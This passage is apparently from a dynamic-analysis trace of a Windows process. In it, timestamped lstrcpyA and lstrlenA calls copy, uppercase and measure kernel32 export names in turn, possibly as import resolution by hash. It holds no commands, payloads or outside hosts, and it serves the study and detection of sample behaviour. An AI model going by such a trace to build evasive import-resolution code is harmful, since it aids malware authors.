lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.191] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.191] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.191] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.191] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.191] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.191] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.192] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.192] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.192] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.192] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.192] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.192] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.192] lstrlenA (lpString="BEEP") returned 4 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.192] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.192] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.192] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.192] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.192] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.192] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.192] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.192] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.192] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.192] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.192] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.192] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.192] lstrlenA (lpString="CANCELIO") returned 8 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.193] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.193] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.193] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.193] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.193] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.193] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.193] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.193] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.193] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.193] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.193] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.193] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.193] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.193] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.193] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.193] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.193] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.193] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.193] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.194] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.194] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.194] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.194] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.194] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.194] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.194] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.194] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.194] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.194] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.194] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.194] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.194] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.194] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.194] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.194] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.194] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.194] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.194] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.195] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.195] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.195] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.195] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.195] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.195] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.195] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.195] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.195] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.195] lstrlenA (lpString="COPYFILEA") returned 9 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.195] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.195] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.195] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.195] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.195] lstrlenA (lpString="COPYFILEW") returned 9 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.195] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.195] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.195] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.195] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.196] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.196] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.196] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.196] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.196] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.196] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.196] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.196] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.196] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.196] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.196] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.196] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.196] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.196] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.196] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.196] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.196] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.196] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.196] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.197] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.197] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.197] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.197] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.197] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.197] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.197] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.197] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.197] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.197] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.197] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.197] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.197] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.197] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.197] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.197] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.197] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.197] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.197] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.198] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.198] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.198] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.198] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.198] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.198] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.198] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.198] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.198] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.198] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.198] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.198] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.198] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.198] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.198] lstrcpyA (in: lpString1=0x3f2d468, 